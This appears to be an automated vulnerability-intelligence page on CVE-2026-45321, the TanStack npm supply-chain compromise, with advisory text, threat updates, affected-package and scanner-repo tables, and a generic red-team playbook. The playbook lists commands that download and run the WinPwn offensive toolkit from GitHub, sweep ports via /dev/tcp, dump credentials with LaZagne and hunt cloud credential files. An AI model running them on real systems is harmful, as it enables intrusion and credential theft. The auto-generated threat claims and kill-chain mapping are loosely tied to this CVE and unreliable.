CVE-2026-45321
Overview
This vulnerability is a supply chain compromise involving a chained exploitation of misconfigurations and memory extraction vulnerabilities within GitHub Actions workflows. The root cause includes a pull_request_target misconfiguration allowing elevated access, cache poisoning across fork-to-base trust boundaries, and runtime memory extraction of OIDC tokens from the Actions runner process. The affected component is the npm publishing process for @tanstack/* packages, specifically the trusted-publisher binding in GitHub Actions for TanStack/router, which enabled unauthorized publishing of malicious package versions.
Vulnerability Description
On 2026-05-11, between approximately 19:20 and 19:26 UTC, 84 malicious versions across 42 @tanstack/* packages were published to the npm registry. The publishes were authenticated via the legitimate GitHub Actions OIDC trusted-publisher binding for TanStack/router, but the publish workflow itself was not modified. The attacker chained three known vulnerability classes — a pull_request_target "Pwn Request" misconfiguration, GitHub Actions cache poisoning across the fork↔base trust boundary, and runtime memory extraction of the OIDC token from the Actions runner process — to publish credential-stealing malware under a trusted identity. Each affected package received exactly two malicious versions, published a few minutes apart.
Impact
An unauthenticated attacker was able to publish credential-stealing malware under a trusted identity to widely used npm packages, enabling supply chain compromise. This allows attackers to distribute malicious code to downstream users and systems relying on these packages, potentially leading to widespread credential theft and further compromise. No user interaction was required beyond installing the affected package versions, exposing organizations to large-scale data breaches and trust erosion in software dependencies.
Solution
Refer to the TanStack security advisory GHSA-g7cv-rxg3-hmpx for detailed remediation steps. Users should upgrade affected packages to versions released after 1.166.15 for arktype-adapter and 1.161.12 for eslint-plugin-router, as well as updated versions of eslint-plugin-start beyond 0.0.4. The advisory and TanStack's postmortem blog provide comprehensive instructions on patching and mitigating the GitHub Actions workflow misconfiguration exploited in this incident.
EPSS vs KEV Prediction — Evolution (30 days)
Overview
Analysis generation failed
Threat Summary
Analysis generation failed
Full Analysis
The vulnerability in question arises from a sophisticated exploitation of the npm registry, specifically targeting multiple packages associated with the TanStack ecosystem. This incident involved the publication of malicious versions of legitimate packages, leveraging a combination of known vulnerabilities. The attack exploited a misconfiguration in the GitHub Actions workflow, particularly the pull_request_target event, which allowed the attacker to execute arbitrary code within the context of the repository. This misconfiguration, coupled with cache poisoning across the trust boundary between forks and bases, enabled the attacker to manipulate the build environment. Furthermore, the extraction of the OpenID Connect (OIDC) token from the Actions runner process facilitated the publication of these malicious packages under a trusted identity, significantly complicating detection efforts.
Attack vectors for this vulnerability are multifaceted. The initial vector involves the misuse of the pull_request_target event, which is intended to allow workflows to run in the context of the base repository. However, when improperly configured, it can allow untrusted code to execute with elevated privileges. The attacker exploited this by chaining it with cache poisoning techniques, which involved manipulating the cached dependencies to include malicious payloads. The final step in this exploitation chain was the extraction of sensitive tokens from the Actions runner, which provided the necessary credentials to publish the compromised packages. This sequence of events illustrates a well-orchestrated attack that can be replicated by other malicious actors if similar configurations are present in other repositories.
The real-world impact of this vulnerability is significant, particularly for organizations that rely on the affected TanStack packages. The malicious versions of these packages were designed to steal credentials, potentially leading to unauthorized access to sensitive systems and data. The risk extends beyond immediate financial loss; compromised credentials can facilitate lateral movement within an organization's network, leading to broader security breaches. Additionally, the reputational damage associated with a successful attack can deter customers and partners, resulting in long-term business implications. Organizations using these packages may face compliance issues if sensitive data is exposed, further compounding the risks.
Detection and mitigation strategies are critical in addressing this vulnerability. Organizations should implement strict monitoring of their package dependencies, utilizing tools that can identify and alert on unauthorized changes or publications in their dependency trees. Regular audits of GitHub Actions workflows are essential to ensure that configurations adhere to security best practices, particularly regarding the use of pull_request_target events. Employing least privilege principles when configuring workflows can minimize the risk of exploitation. Furthermore, organizations should consider implementing automated security checks as part of their CI/CD pipelines to detect potential vulnerabilities before code is merged or deployed. Educating development teams about secure coding practices and the implications of misconfigurations can also significantly reduce the likelihood of similar attacks.
In conclusion, the vulnerability affecting the TanStack packages exemplifies the evolving landscape of software supply chain attacks. By exploiting known vulnerabilities in configuration and trust boundaries, attackers can introduce malicious code into widely used libraries, posing severe risks to organizations. A proactive approach to security, encompassing continuous monitoring, strict access controls, and education, is essential to mitigate the risks associated with such vulnerabilities and protect organizational assets from potential exploitation.
CSURFACE threat intelligence has identified a marked escalation in exploitation activity targeting CVE-2026-45321, evidenced by the emergence of multiple new proof-of-concept exploits publicly available on GitHub. This development coincides with the vulnerability’s recent inclusion in the CISA Known Exploited Vulnerabilities (KEV) catalog, underscoring its recognition as a critical risk by federal cybersecurity authorities. Our telemetry indicates a significant uptick in detection signals associated with this supply chain compromise, reflecting growing adversary interest and operationalization. The Elevation of Privilege and Remote Code Execution potential inherent in this vulnerability, combined with its exploitation by ransomware actors as noted in the KEV advisory, substantially amplifies the threat landscape. Consequently, the risk level for organizations relying on affected @tanstack packages has escalated to critical, necessitating heightened vigilance. The increased EPSS score and rapid upward trend further validate the urgency and likelihood of exploitation attempts in the near term.
Update 2 — June 15, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts related to CVE-2026-45321, as evidenced by a significant uptick in detection activity across multiple telemetry sources. Despite a notable decline in the EPSS score, indicating a reduced probability of widespread exploitation in the immediate term, the surge in observed adversary actions suggests increasing operationalization of this vulnerability within targeted campaigns. The persistence of ransomware actors leveraging this flaw underscores its continued attractiveness as an attack vector, particularly given the complex supply chain compromise involving authenticated GitHub Actions workflows. This divergence between EPSS trends and real-world exploitation signals a nuanced threat environment where opportunistic adversaries are refining tactics to bypass existing defenses. Consequently, the overall threat level remains critical, with defenders advised to maintain heightened situational awareness as exploitation attempts become more frequent and sophisticated.
Affected Products (343)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Abhishake1 | Supersurkhet\/cli | 0.0.2 |
cpe:2.3:a:abhishake1:supersurkhet\/cli:0.0.2:*:*:*:*:node.js:*:*
|
|
|
Abhishake1 | Supersurkhet\/cli | 0.0.3 |
cpe:2.3:a:abhishake1:supersurkhet\/cli:0.0.3:*:*:*:*:node.js:*:*
|
|
|
Abhishake1 | Supersurkhet\/cli | 0.0.4 |
cpe:2.3:a:abhishake1:supersurkhet\/cli:0.0.4:*:*:*:*:node.js:*:*
|
|
|
Abhishake1 | Supersurkhet\/cli | 0.0.5 |
cpe:2.3:a:abhishake1:supersurkhet\/cli:0.0.5:*:*:*:*:node.js:*:*
|
|
|
Abhishake1 | Supersurkhet\/cli | 0.0.6 |
cpe:2.3:a:abhishake1:supersurkhet\/cli:0.0.6:*:*:*:*:node.js:*:*
|
|
|
Abhishake1 | Supersurkhet\/cli | 0.0.7 |
cpe:2.3:a:abhishake1:supersurkhet\/cli:0.0.7:*:*:*:*:node.js:*:*
|
|
|
Abhishake1 | Supersurkhet\/sdk | 0.0.2 |
cpe:2.3:a:abhishake1:supersurkhet\/sdk:0.0.2:*:*:*:*:node.js:*:*
|
|
|
Abhishake1 | Supersurkhet\/sdk | 0.0.3 |
cpe:2.3:a:abhishake1:supersurkhet\/sdk:0.0.3:*:*:*:*:node.js:*:*
|
|
|
Abhishake1 | Supersurkhet\/sdk | 0.0.4 |
cpe:2.3:a:abhishake1:supersurkhet\/sdk:0.0.4:*:*:*:*:node.js:*:*
|
|
|
Abhishake1 | Supersurkhet\/sdk | 0.0.5 |
cpe:2.3:a:abhishake1:supersurkhet\/sdk:0.0.5:*:*:*:*:node.js:*:*
|
|
|
Abhishake1 | Supersurkhet\/sdk | 0.0.6 |
cpe:2.3:a:abhishake1:supersurkhet\/sdk:0.0.6:*:*:*:*:node.js:*:*
|
|
|
Abhishake1 | Supersurkhet\/sdk | 0.0.7 |
cpe:2.3:a:abhishake1:supersurkhet\/sdk:0.0.7:*:*:*:*:node.js:*:*
|
|
|
Abhishake1 | Taskflow-Corp\/cli | 0.1.24 |
cpe:2.3:a:abhishake1:taskflow-corp\/cli:0.1.24:*:*:*:*:node.js:*:*
|
|
|
Abhishake1 | Taskflow-Corp\/cli | 0.1.25 |
cpe:2.3:a:abhishake1:taskflow-corp\/cli:0.1.25:*:*:*:*:node.js:*:*
|
|
|
Abhishake1 | Taskflow-Corp\/cli | 0.1.26 |
cpe:2.3:a:abhishake1:taskflow-corp\/cli:0.1.26:*:*:*:*:node.js:*:*
|
|
|
Abhishake1 | Taskflow-Corp\/cli | 0.1.27 |
cpe:2.3:a:abhishake1:taskflow-corp\/cli:0.1.27:*:*:*:*:node.js:*:*
|
|
|
Abhishake1 | Taskflow-Corp\/cli | 0.1.28 |
cpe:2.3:a:abhishake1:taskflow-corp\/cli:0.1.28:*:*:*:*:node.js:*:*
|
|
|
Abhishake1 | Taskflow-Corp\/cli | 0.1.29 |
cpe:2.3:a:abhishake1:taskflow-corp\/cli:0.1.29:*:*:*:*:node.js:*:*
|
|
|
Agentworkhq | Agentwork-Cli | 0.1.4 |
cpe:2.3:a:agentworkhq:agentwork-cli:0.1.4:*:*:*:*:node.js:*:*
|
|
|
Agentworkhq | Agentwork-Cli | 0.1.5 |
cpe:2.3:a:agentworkhq:agentwork-cli:0.1.5:*:*:*:*:node.js:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (13)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
fabriziosalmi/tanstack-compromise-checker
Shell script to detect TanStack npm supply chain attack indicators (CVE-2026-45321 / GHSA-g7cv-rxg3-hmpx)
|
fabriziosalmi | 2 | 0 | 2026-05-16 | View |
|
qi-scape/scan-shai-hulud
Detect CVE-2026-45321 Mini Shai-Hulud supply chain compromise — scans for 170 npm + 2 PyPI poisoned packages across TanS...
|
qi-scape | 1 | 1 | 2026-05-12 | View |
|
Intrudify/mini-shai-hulud-scanner
Scanner for the Mini Shai-Hulud npm/PyPI supply chain worm (NHS CC-4781 · CVE-2026-45321). Detects gh-token-monitor pers...
|
Intrudify | 2 | 0 | 2026-05-13 | View |
|
nkopylov/tanscript-exploit-check
IOC checker for the TanStack/Mini Shai-Hulud npm supply chain attack (CVE-2026-45321)
|
nkopylov | 1 | 0 | 2026-05-18 | View |
|
shayr1/shai-hulud-scan
Claude Code skill to scan machines for Mini Shai-Hulud (CVE-2026-45321) supply chain worm IOCs
|
shayr1 | 1 | 0 | 2026-05-12 | View |
|
7whyex/CVE-2026-45321-Tanstack
|
7whyex | 0 | 0 | 2026-06-25 | View |
|
adriannurrr/CVE-2026-45321-Tanstack
|
adriannurrr | 0 | 0 | 2026-06-21 | View |
|
ry-allan/tanstack-compromise-checker
Detects CVE-2026-45321 (TanStack supply chain compromise) and Mini Shai-Hulud worm artifacts. Scans node_modules, lockfi...
|
ry-allan | 0 | 0 | 2026-05-12 | View |
|
Yomisana/are-you-get-tanstack-attack
Are you get Tanstack Supply chain attack attack of 5/11? CVE-2026-45321 / GHSA-g7cv-rxg3-hmpx
|
Yomisana | 0 | 0 | 2026-05-12 | View |
|
Caixa-git/tanstack-shield
🛡️ One-command scanner for CVE-2026-45321 — TanStack npm supply-chain attack
|
Caixa-git | 0 | 0 | 2026-05-12 | View |
|
digi4care/shai-scan
Zero-dependency CLI scanner for npm/PyPI supply chain compromises. Detects compromised packages in lockfiles and system-...
|
digi4care | 0 | 0 | 2026-05-16 | View |
|
prashanthnataraj/mini-shai-hulud-detector
One-command scanner for the Mini Shai-Hulud npm supply-chain worm (CVE-2026-45321). Detect before rotating tokens.
|
prashanthnataraj | 0 | 0 | 2026-05-20 | View |
|
renewablehacking/CVE-2026-45321-Tanstack
|
renewablehacking | 0 | 0 | 2026-05-25 | View |
Threat Feed
15 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Active exploitation confirmed — vendor: TanStack, product: TanStack
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (7)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-442 | Infected Software |
30%
|
Medium | High | |
| CAPEC-448 | Embed Virus into DLL |
30%
|
Medium | High | |
| CAPEC-636 | Hiding Malicious Data or Code within Files |
30%
|
— | High |
Red Team Playbook
34 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
kubectl run #{pod_name} --image=#{image_name} --restart=Never --attach --rm -i -- bash -lc "mkdir -p /tmp/test && cd /tmp/test && npm init -y >/dev/null 2>&1 && echo '--- package.json before install ---' && cat package.json && npm install #{package_name} --no-audit --no-fund --no-package-lock && echo '--- package.json after install ---' && cat package.json"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (6)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2026-45321 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/TanStack/router/security/advisories/GHSA-g7cv-rxg3-hmpx |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/TanStack/router/issues/7383 |
| tanstack.com |
GitHub CVE
x_refsource_MISC
|
https://tanstack.com/blog/npm-supply-chain-compromise-postmortem |
| stepsecurity.io |
GitHub CVE
x_refsource_MISC
|
https://www.stepsecurity.io/blog/mini-shai-hulud-is-back-a-self-spreading-supply-chain-attack-hits-the-npm-ecosystem |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-45321 |